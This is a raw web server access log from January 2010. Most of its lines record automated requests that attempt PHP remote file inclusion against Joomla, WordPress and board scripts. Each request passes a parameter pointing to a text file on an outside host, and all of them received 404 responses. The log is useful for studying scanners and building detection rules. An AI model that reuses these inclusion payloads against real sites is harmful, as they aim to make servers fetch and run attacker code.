199.71.213.177 - - [17/Jan/2010:03:20:41 -0500] "GET /logs/access_log.Q109070800//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://manormarketing.tv/id.txt??? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
212.175.5.130 - - [17/Jan/2010:03:20:46 -0500] "GET /logs/access_log.Q109071400%20%20//wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://jackersky.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
209.59.12.99 - - [17/Jan/2010:03:22:00 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
203.124.149.168 - - [17/Jan/2010:03:22:06 -0500] "GET /logs/access_log.Q109092200%20%20//errors.php?error=http://snia2009.com//components/com_jce/zfxid1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
203.124.149.168 - - [17/Jan/2010:03:22:06 -0500] "GET /logs//errors.php?error=http://snia2009.com//components/com_jce/zfxid1.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
203.124.149.168 - - [17/Jan/2010:03:22:07 -0500] "GET //errors.php?error=http://snia2009.com//components/com_jce/zfxid1.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
112.216.36.174 - - [17/Jan/2010:03:22:29 -0500] "GET ////board.php?_SERVER[DOCUMENT_ROOT]=http://schill-struemp.de/news////parse/id1.txt??? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
112.216.36.174 - - [17/Jan/2010:03:22:29 -0500] "GET /logs////board.php?_SERVER[DOCUMENT_ROOT]=http://schill-struemp.de/news////parse/id1.txt??? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
112.216.36.174 - - [17/Jan/2010:03:22:29 -0500] "GET /logs/error_log.Q109102500%20%20////board.php?_SERVER[DOCUMENT_ROOT]=http://schill-struemp.de/news////parse/id1.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
112.216.36.174 - - [17/Jan/2010:03:22:49 -0500] "GET /logs/error_log.Q110010400%20%20////board.php?_SERVER[DOCUMENT_ROOT]=http://schill-struemp.de/news////parse/id1.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
203.124.149.168 - - [17/Jan/2010:03:23:36 -0500] "GET /logs/error_log.Q109060400%20%20//errors.php?error=http://snia2009.com//components/com_jce/zfxid1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
125.85.239.170 - - [17/Jan/2010:03:24:10 -0500] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/seminars.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQPinyin 689)"
125.85.239.170 - - [17/Jan/2010:03:24:10 -0500] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/seminars.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQPinyin 689)"
125.85.239.170 - - [17/Jan/2010:03:24:11 -0500] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/seminars.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQPinyin 689)"
125.85.239.170 - - [17/Jan/2010:03:24:11 -0500] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/seminars.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQPinyin 689)"
199.71.213.177 - - [17/Jan/2010:03:24:36 -0500] "GET /logs/access_log.Q109070800%20%20//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://manormarketing.tv/id.txt??? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
199.71.213.177 - - [17/Jan/2010:03:24:36 -0500] "GET /logs/access_log.Q109070800%20%20//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://manormarketing.tv/id.txt??? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
195.5.163.207 - - [17/Jan/2010:03:25:02 -0500] "GET /logs/access_log.Q109070500///kboard/kboard.php?board=http://www.syforest.com/fx29id1.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
195.5.163.207 - - [17/Jan/2010:03:25:02 -0500] "GET /logs/access_log.Q109101000///kboard/kboard.php?board=http://www.syforest.com/fx29id1.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
189.72.28.14 - - [17/Jan/2010:03:25:06 -0500] "GET /logs/access_log.Q109101500//include/prodler.class.php?sPath=http://astro1.fileave.com/id1.txt???? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
195.5.163.207 - - [17/Jan/2010:03:25:12 -0500] "GET /logs/access_log.Q109070500///kboard/kboard.php?board=http://www.syforest.com/fx29id1.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
195.5.163.207 - - [17/Jan/2010:03:25:13 -0500] "GET /logs/access_log.Q109101000///kboard/kboard.php?board=http://www.syforest.com/fx29id1.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
67.195.37.174 - - [17/Jan/2010:03:25:50 -0500] "GET /logs/error_log.Q109102000 HTTP/1.0" 200 3642071 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.37.174 - - [17/Jan/2010:03:25:51 -0500] "GET /logs/error_log.Q109102000 HTTP/1.0" 200 3642071 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
203.130.149.241 - - [17/Jan/2010:03:26:36 -0500] "GET /logs/access_log.Q109051700%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.srilankatruth.com/OneAdmin/newspublish/id.txt? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
203.130.149.241 - - [17/Jan/2010:03:26:43 -0500] "GET /logs/access_log.Q109082500%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.srilankatruth.com/OneAdmin/newspublish/id.txt? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
209.59.12.99 - - [17/Jan/2010:03:27:03 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
125.160.17.200 - - [17/Jan/2010:03:27:55 -0500] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://soik.or.kr/soik///id1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
125.160.17.200 - - [17/Jan/2010:03:27:55 -0500] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://soik.or.kr/soik///id1.txt??? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
125.160.17.200 - - [17/Jan/2010:03:27:55 -0500] "GET /logs/error_log.Q109121700%20%20//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://soik.or.kr/soik///id1.txt??? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
125.160.17.200 - - [17/Jan/2010:03:27:58 -0500] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://soik.or.kr/soik///id1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
125.160.17.200 - - [17/Jan/2010:03:27:58 -0500] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://soik.or.kr/soik///id1.txt??? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
125.160.17.200 - - [17/Jan/2010:03:27:58 -0500] "GET /logs/error_log.Q109121700%20%20//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://soik.or.kr/soik///id1.txt??? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
66.249.68.142 - - [17/Jan/2010:03:28:08 -0500] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L415C905A88A3B500B34F01C+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
199.71.213.177 - - [17/Jan/2010:03:28:53 -0500] "GET /logs/access_log.Q109052100//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://manormarketing.tv/id.txt??? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
199.71.213.177 - - [17/Jan/2010:03:28:53 -0500] "GET /logs/access_log.Q109121000//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://manormarketing.tv/id.txt??? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
199.71.213.177 - - [17/Jan/2010:03:29:00 -0500] "GET /logs/access_log.Q109052100//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://manormarketing.tv/id.txt??? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
199.71.213.177 - - [17/Jan/2010:03:29:00 -0500] "GET /logs/access_log.Q109121000//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://manormarketing.tv/id.txt??? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
125.160.17.200 - - [17/Jan/2010:03:29:23 -0500] "GET /logs/access_log.Q109110100%20%20//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://soik.or.kr/soik///id1.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
125.160.17.200 - - [17/Jan/2010:03:30:48 -0500] "GET /logs/access_log.Q109110100%20%20//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://soik.or.kr/soik///id1.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
212.175.5.130 - - [17/Jan/2010:03:31:04 -0500] "GET /logs/error_log.Q109101400//wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://jackersky.fileave.com/id1.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
212.175.5.130 - - [17/Jan/2010:03:31:12 -0500] "GET /logs/access_log.Q109070200//wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://jackersky.fileave.com/id1.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
66.249.68.41 - - [17/Jan/2010:03:31:28 -0500] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.41 - - [17/Jan/2010:03:31:28 -0500] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L016A1B5D63629200426D038+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.7.173.20 - - [17/Jan/2010:03:32:24 -0500] "GET /logs/access_log.Q109101500//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
67.195.37.174 - - [17/Jan/2010:03:31:45 -0500] "GET /logs/access_log.Q109112000 HTTP/1.0" 200 4313908 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.12.99 - - [17/Jan/2010:03:32:35 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
207.57.93.88 - - [17/Jan/2010:03:32:39 -0500] "GET /logs/access_log.Q109112100/errors.php?error=http://soik.or.kr/soik///id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
207.57.93.88 - - [17/Jan/2010:03:32:39 -0500] "GET /logs/errors.php?error=http://soik.or.kr/soik///id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
207.57.93.88 - - [17/Jan/2010:03:32:39 -0500] "GET /errors.php?error=http://soik.or.kr/soik///id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:03:33:00 -0500] "GET ///index.php?option=com_pollxt&Itemid=&mosConfig.absolute.path=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:03:33:00 -0500] "GET /logs/access_log.Q109120800%20%20///index.php?option=com_pollxt&Itemid=&mosConfig.absolute.path=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:03:33:00 -0500] "GET /logs///index.php?option=com_pollxt&Itemid=&mosConfig.absolute.path=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:03:33:00 -0500] "GET /logs/access_log.Q109091400%20%20///index.php?option=com_pollxt&Itemid=&mosConfig.absolute.path=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
207.57.93.88 - - [17/Jan/2010:03:33:04 -0500] "GET /logs/access_log.Q109080600/errors.php?error=http://soik.or.kr/soik///id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
207.57.93.88 - - [17/Jan/2010:03:33:08 -0500] "GET /logs/errors.php?error=http://soik.or.kr/soik///id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
207.57.93.88 - - [17/Jan/2010:03:33:08 -0500] "GET /errors.php?error=http://soik.or.kr/soik///id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
207.57.93.88 - - [17/Jan/2010:03:33:08 -0500] "GET /logs/access_log.Q109112100%20%20/errors.php?error=http://soik.or.kr/soik///id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
121.78.118.94 - - [17/Jan/2010:03:33:14 -0500] "GET //skin/zero_vote/error.php?dir=http://arda.or.th/userfiles/id1.txt??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
121.78.118.94 - - [17/Jan/2010:03:33:16 -0500] "GET /logs/access_log.Q109092100//skin/zero_vote/error.php?dir=http://arda.or.th/userfiles/id1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
121.78.118.94 - - [17/Jan/2010:03:33:16 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://arda.or.th/userfiles/id1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
121.78.118.94 - - [17/Jan/2010:03:33:27 -0500] "GET /logs/access_log.Q109081600//skin/zero_vote/error.php?dir=http://arda.or.th/userfiles/id1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
207.57.93.88 - - [17/Jan/2010:03:33:36 -0500] "GET /logs/access_log.Q109080600%20%20/errors.php?error=http://soik.or.kr/soik///id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
95.108.128.242 - - [17/Jan/2010:03:33:37 -0500] "GET /logs/error_log.Q109090300 HTTP/1.1" 304 - "-" "Yandex/1.01.001 (compatible; Win16; I)"
38.99.120.74 - - [17/Jan/2010:03:33:53 -0500] "GET /logs/access_log.Q109092100//skin/zero_vote/error.php?dir=http://arda.or.th/userfiles/id1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:03:33:57 -0500] "GET /logs///index.php?option=com_pollxt&Itemid=&mosConfig.absolute.path=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:03:33:57 -0500] "GET ///index.php?option=com_pollxt&Itemid=&mosConfig.absolute.path=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:03:33:57 -0500] "GET /logs/access_log.Q109080400///index.php?option=com_pollxt&Itemid=&mosConfig.absolute.path=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
38.99.120.74 - - [17/Jan/2010:03:33:58 -0500] "GET //skin/zero_vote/error.php?dir=http://arda.or.th/userfiles/id1.txt??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
38.99.120.74 - - [17/Jan/2010:03:33:59 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://arda.or.th/userfiles/id1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
38.99.120.74 - - [17/Jan/2010:03:34:18 -0500] "GET /logs/access_log.Q109081600//skin/zero_vote/error.php?dir=http://arda.or.th/userfiles/id1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
203.124.149.168 - - [17/Jan/2010:03:34:25 -0500] "GET /logs/error_log.Q109060400//errors.php?error=http://snia2009.com//components/com_jce/zfxid1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
203.124.149.168 - - [17/Jan/2010:03:34:25 -0500] "GET /logs/error_log.Q109120700//errors.php?error=http://snia2009.com//components/com_jce/zfxid1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
125.160.17.200 - - [17/Jan/2010:03:34:28 -0500] "GET /logs/access_log.Q109100700%20%20//main.php?sayfa=http://soik.or.kr/soik///id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
125.160.17.200 - - [17/Jan/2010:03:34:28 -0500] "GET //main.php?sayfa=http://soik.or.kr/soik///id1.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
125.160.17.200 - - [17/Jan/2010:03:34:28 -0500] "GET /logs//main.php?sayfa=http://soik.or.kr/soik///id1.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
218.149.85.32 - - [17/Jan/2010:03:34:32 -0500] "GET //appserv/main.php?appserv_root=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
218.149.85.32 - - [17/Jan/2010:03:34:32 -0500] "GET /logs//appserv/main.php?appserv_root=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
218.149.85.32 - - [17/Jan/2010:03:34:32 -0500] "GET /logs/access_log.Q109112100%20%20//appserv/main.php?appserv_root=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:03:34:34 -0500] "GET ////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:03:34:34 -0500] "GET /logs////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:03:34:34 -0500] "GET /logs/access_log.Q109051600////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:03:34:34 -0500] "GET /logs/access_log.Q109082500////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
218.149.85.32 - - [17/Jan/2010:03:34:39 -0500] "GET /logs/access_log.Q109112100%20%20//appserv/main.php?appserv_root=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
218.149.85.32 - - [17/Jan/2010:03:34:39 -0500] "GET /logs//appserv/main.php?appserv_root=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
218.149.85.32 - - [17/Jan/2010:03:34:40 -0500] "GET //appserv/main.php?appserv_root=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
125.160.17.200 - - [17/Jan/2010:03:34:46 -0500] "GET /logs/access_log.Q109072900%20%20//main.php?sayfa=http://soik.or.kr/soik///id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
218.149.85.32 - - [17/Jan/2010:03:34:50 -0500] "GET //appserv/main.php?appserv_root=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
218.149.85.32 - - [17/Jan/2010:03:34:50 -0500] "GET /logs//appserv/main.php?appserv_root=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
218.149.85.32 - - [17/Jan/2010:03:34:50 -0500] "GET /logs/access_log.Q109112100%20%20//appserv/main.php?appserv_root=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
125.160.17.200 - - [17/Jan/2010:03:35:07 -0500] "GET /logs//main.php?sayfa=http://soik.or.kr/soik///id1.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
125.160.17.200 - - [17/Jan/2010:03:35:07 -0500] "GET //main.php?sayfa=http://soik.or.kr/soik///id1.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
125.160.17.200 - - [17/Jan/2010:03:35:07 -0500] "GET /logs/access_log.Q109100700%20%20//main.php?sayfa=http://soik.or.kr/soik///id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
218.149.85.32 - - [17/Jan/2010:03:35:12 -0500] "GET /logs/access_log.Q109080600%20%20//appserv/main.php?appserv_root=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
218.149.85.32 - - [17/Jan/2010:03:35:15 -0500] "GET /logs/access_log.Q109080600%20%20//appserv/main.php?appserv_root=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
218.149.85.32 - - [17/Jan/2010:03:35:25 -0500] "GET /logs/access_log.Q109080600%20%20//appserv/main.php?appserv_root=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
195.5.163.207 - - [17/Jan/2010:03:35:44 -0500] "GET /logs/error_log.Q109091800///appserv/main.php?appserv_root=http://www.syforest.com/fx29id1.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
125.160.17.200 - - [17/Jan/2010:03:35:53 -0500] "GET /logs/access_log.Q109072900%20%20//main.php?sayfa=http://soik.or.kr/soik///id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
195.5.163.207 - - [17/Jan/2010:03:35:56 -0500] "GET /logs/error_log.Q109091800///appserv/main.php?appserv_root=http://www.syforest.com/fx29id1.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
189.72.28.14 - - [17/Jan/2010:03:36:18 -0500] "GET /logs/index.php?pagina=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
189.72.28.14 - - [17/Jan/2010:03:36:19 -0500] "GET /logs/access_log.Q109111900%20%20/index.php?pagina=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
189.72.28.14 - - [17/Jan/2010:03:36:21 -0500] "GET /index.php?pagina=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
195.5.163.207 - - [17/Jan/2010:03:36:52 -0500] "GET /logs/error_log.Q109080600///appserv/main.php?appserv_root=http://www.syforest.com/fx29id1.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
94.125.182.24 - - [17/Jan/2010:03:36:58 -0500] "GET /index.php?pagina=http://rixs.interfree.it/echos.txt?? HTTP/1.1" 404 207 "-" "libwww-perl/5.813"
94.125.182.24 - - [17/Jan/2010:03:36:58 -0500] "GET /logs/access_log.Q109111900/index.php?pagina=http://rixs.interfree.it/echos.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.813"
94.125.182.24 - - [17/Jan/2010:03:36:58 -0500] "GET /logs/index.php?pagina=http://rixs.interfree.it/echos.txt?? HTTP/1.1" 404 212 "-" "libwww-perl/5.813"
195.5.163.207 - - [17/Jan/2010:03:37:08 -0500] "GET /logs/error_log.Q109080600///appserv/main.php?appserv_root=http://www.syforest.com/fx29id1.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
94.125.182.24 - - [17/Jan/2010:03:37:16 -0500] "GET /logs/error_log.Q109070600/index.php?pagina=http://rixs.interfree.it/echos.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.813"
209.59.12.99 - - [17/Jan/2010:03:37:40 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
203.237.238.234 - - [17/Jan/2010:03:38:13 -0500] "GET /logs/error_log.Q109092500%20%20//skin/uks_gallery_v3020/setup.php?dir=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
203.237.238.234 - - [17/Jan/2010:03:38:13 -0500] "GET /logs/access_log.Q109092400%20%20//skin/uks_gallery_v3020/setup.php?dir=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
203.237.238.234 - - [17/Jan/2010:03:38:13 -0500] "GET /logs//skin/uks_gallery_v3020/setup.php?dir=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
203.237.238.234 - - [17/Jan/2010:03:38:13 -0500] "GET //skin/uks_gallery_v3020/setup.php?dir=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
203.237.238.234 - - [17/Jan/2010:03:38:13 -0500] "GET /logs//skin/uks_gallery_v3020/setup.php?dir=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
203.237.238.234 - - [17/Jan/2010:03:38:13 -0500] "GET //skin/uks_gallery_v3020/setup.php?dir=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
203.237.238.234 - - [17/Jan/2010:03:38:13 -0500] "GET /logs/access_log.Q109092400%20%20//skin/uks_gallery_v3020/setup.php?dir=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
189.72.28.14 - - [17/Jan/2010:03:38:14 -0500] "GET /logs/error_log.Q109070600%20%20/index.php?pagina=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
203.237.238.234 - - [17/Jan/2010:03:38:14 -0500] "GET /logs/error_log.Q109092500%20%20//skin/uks_gallery_v3020/setup.php?dir=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
189.72.28.14 - - [17/Jan/2010:03:38:32 -0500] "GET /index.php?pagina=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
189.72.28.14 - - [17/Jan/2010:03:38:33 -0500] "GET /logs/index.php?pagina=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
189.72.28.14 - - [17/Jan/2010:03:38:33 -0500] "GET /logs/access_log.Q109111900/index.php?pagina=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
189.72.28.14 - - [17/Jan/2010:03:39:07 -0500] "GET /logs/access_log.Q109120100/index.php?pagina=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
123.125.66.57 - - [17/Jan/2010:03:39:59 -0500] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
115.68.2.144 - - [17/Jan/2010:03:40:06 -0500] "GET ///delete_all.php?board_skin_path=http://www.qqe.ru/forum//attachments/id1.txt???? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
115.68.2.144 - - [17/Jan/2010:03:40:06 -0500] "GET /logs///delete_all.php?board_skin_path=http://www.qqe.ru/forum//attachments/id1.txt???? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
115.68.2.144 - - [17/Jan/2010:03:40:07 -0500] "GET /logs/error_log.Q109071900///delete_all.php?board_skin_path=http://www.qqe.ru/forum//attachments/id1.txt???? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
115.68.2.144 - - [17/Jan/2010:03:40:22 -0500] "GET /logs///delete_all.php?board_skin_path=http://www.qqe.ru/forum//attachments/id1.txt???? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
115.68.2.144 - - [17/Jan/2010:03:40:22 -0500] "GET /logs/error_log.Q109071900///delete_all.php?board_skin_path=http://www.qqe.ru/forum//attachments/id1.txt???? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
115.68.2.144 - - [17/Jan/2010:03:40:23 -0500] "GET ///delete_all.php?board_skin_path=http://www.qqe.ru/forum//attachments/id1.txt???? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
195.5.163.207 - - [17/Jan/2010:03:40:30 -0500] "GET /logs/access_log.Q109080600///appserv/main.php?appserv_root=http://www.syforest.com/fx29id1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
195.5.163.207 - - [17/Jan/2010:03:40:31 -0500] "GET /logs/access_log.Q109060300///appserv/main.php?appserv_root=http://www.syforest.com/fx29id1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
121.101.214.54 - - [17/Jan/2010:03:40:36 -0500] "GET /logs/error_log.Q109102500////board.php?_SERVER[DOCUMENT_ROOT]=http://schill-struemp.de/news////parse/id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
